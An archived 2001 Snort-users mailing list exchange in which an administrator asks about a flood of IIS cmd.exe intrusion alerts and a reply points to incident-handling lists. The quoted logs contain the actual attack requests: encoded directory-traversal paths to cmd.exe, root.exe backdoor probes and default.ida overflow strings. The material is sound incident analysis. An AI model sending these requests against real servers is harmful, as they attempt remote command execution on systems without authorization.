[Snort-users] WEB-IIS Cmd attack

John Sage jsage at ...2022...
Tue Sep 18 08:34:07 EDT 2001


See the developing threads at:

http://www.incidents.org/archives/intrusions/thrd1.html

Of course, the threads don't post to the archive quite as fast as they 
are happening on the maillist at:

intrusions at ...2034...

See:

http://www.incidents.org/detect/list_info.php


- John

-- 
John Sage
FinchHaven, Vashon Island, WA, USA
http://www.finchhaven.com/
mailto:jsage at ...2022...
"The web is so, like, five minutes ago..."


Togan Muftuoglu wrote:

> Hi,
> 
> Suddenly there is flood of Web-IIS CM attacks this is just a tiny bit
> of it, 
> 
> Is this a new variant or script kiddes around ?
> 
> TIA
> 
> Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
> Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
> Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
> Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
> Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
> Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
> Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
> Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
> Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
> Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
> Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
> Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
> Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
> Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
> Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
> Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
> Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
> Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
> Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
> Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
> Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
> Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
> Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
> Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
> Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
> Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
> Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
> Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
> Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
> Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
> Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
> Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
> Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
> Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
> Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
> Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
> Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
> Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
> Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
> Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
> Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
> Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
> Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
> Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
> Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
> Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
> Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
> Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
> Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
> Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
> Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
> Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.113.99:4917 -> 212.174.50.248:80
> 
> 
> ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
> 
> ----- End forwarded message -----
> 
> 






More information about the Snort-users mailing list